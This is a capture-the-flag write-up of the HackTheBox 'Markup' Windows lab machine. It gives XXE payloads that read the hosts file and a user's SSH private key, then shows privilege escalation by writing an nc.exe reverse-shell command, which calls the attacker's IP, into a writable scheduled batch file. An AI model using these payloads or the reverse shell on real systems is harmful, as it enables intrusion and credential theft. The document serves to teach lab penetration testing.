HackTheBox - Markup Writeup

SH∆FIQ ∆IM∆N included in HacktheBox Windows

06-08-2021 783 words 4 minutes

Contents

Box author | MrR3boot

Enumeration

Top 1000 ports scan

1

nmap -sC -sV -oN nmap/initial 10.10.10.49

the result

/posts/htb/markup/nmap_1000.png — nmap initial scan

All ports scan

1

nmap -sC -sV -p- -oN nmap/all_ports 10.10.10.49

the result

/posts/htb/markup/nmap_all_ports.png — nmap allports scan

Open Ports

Well, both the Nmap scan result are the same
- port 22/SSH
- port 80/HTTP
- port 443/HTTPs

Webpage

Let’s take a look at the webpage HTTP

/posts/htb/markup/login.png — login webpage

Look’s like just a regular login page.
We can try to login with credentials we’ve found from the previous box called Included
Let’s try it

/posts/htb/markup/home.png — home webpage

Success
Now, time to enumerate/play around with this page.

Order

Well, I found out. We can order something on the order page
Let’s try ordering something
the result

Every time a user orders something it’s always pop up this message.
Let’s try check how this form handle the request

Burpsuite

I’m gonna intercept the request by using burpsuite
Then, send the request into repeater tab
I found this body kinda weird at first.
It’s doesn't look like any JSON data

/posts/htb/markup/xml.png — xml post data

Then, I realize this is XML [Extensible Markup Language]
Well, I heard something about XML injection before
Let’s try it

XXE [XML External Entity Injection]

Description

An XML External Entity attack is a type of attack against an application that parses XML input.
This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

Wikipedia - XML external entity attack

Source

New Entity

I’m going to test if a simple new ENTITY declaration is working
here’s what the payload gonna looks like.
Source
- HackTricks - Xml External Entity

1
2
3
4
5
6


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example "test"> ]>
<stockCheck>
<productId>&example;</productId>
<storeId>1</storeId>
</stockCheck>

the result

/posts/htb/markup/XML-test.png — xxe result

it is working

Read File

Now, Let’s try to read a file with it
So, I’m gonna insert this command

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


<?xml version = "1.0"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "file:///c:/windows/system32/drivers/etc/hosts"> ]>
<order>
    <quantity>
        1
    </quantity>
    <item>
        &example;
    </item>
    <address>
        Bed for sleeping of course
    </address>
</order>

the result

/posts/htb/markup/host.png — xxe read file

Wow! It works

Foothold/Gaining Access

Remember this machine has SSH open.
Let’s try to read the SSH private key
Windows SSH key locate here: C:\Users\USERNAME\.ssh\

SSH

I’m gonna put this as a payload

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


<?xml version = "1.0"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "file:///c:/users/daniel/.ssh/id_rsa"> ]>
<order>
    <quantity>
        1
    </quantity>
    <item>
        &example;
    </item>
    <address>
        Bed for sleeping of course
    </address>
</order>

the result

/posts/htb/markup/ssh-prikey.png — xxe read ssh key

WOW! we’ve got the private key
Let’s copy it and try login with SSH

Tip

Before we can log in. Make sure to change the permission of the key with the command chmod 600 <filename>

Now, Let’s try login with this command

`1`	`ssh -i <filename> [email protected]`

/posts/htb/markup/ssh.png — ssh as daniel

I’m in

User Flag

Log-Management

Let’s start to enumerate this machine
I found kinda sus folder in the root directory
- maybe I don’t know it’s actually exists

/posts/htb/markup/log-manage.png — found Log-Management directory

The folder called Log-Management
Found the file name job.bat and see the content of that file

/posts/htb/markup/job.png — contents inside job.bat file

So, I’m gonna assume this script for clearing event log and gonna run automatically like UNIX cronjob
¯\__(ツ)_/¯

Checking File Permission

We can abuse this if we had the permission to change the content of the file
Source
I’m going to run this command

1

icacls job.txt

/posts/htb/markup/icacls.png — checking file permission

we’ve got full access to that file
remember we’re still daniel
Let’s get the shell

Privilege Escalation

nc.exe

Let’s get the reverse shell.
First, we need to upload nc.exe into the machine

Windows do not come with nc installed. So, we need to upload it

/posts/htb/markup/awang_2.png — transfer nc.exe

First, let’s start our nc for listening to the connection
Then, put this payload in job.bat

1

c:\log-management\nc.exe -e cmd.exe 10.10.14.43 9901

/posts/htb/markup/tulis.png — put the payload in job.bat file

the result
we’ve got the shell and own the box

/posts/htb/markup/yes.png — shell as administrator

Admin Flag

Conclusion

I’ve learned a lot today. The XXE is so cool and it also can be dangerous if the input is not properly configured. Talk about “configure”. The file admin can run also need to configure properly in this case file called job.bat. Once again, don’t use the same password.

I have a fun time doing this machine and I hope you guys do too. Bye ;)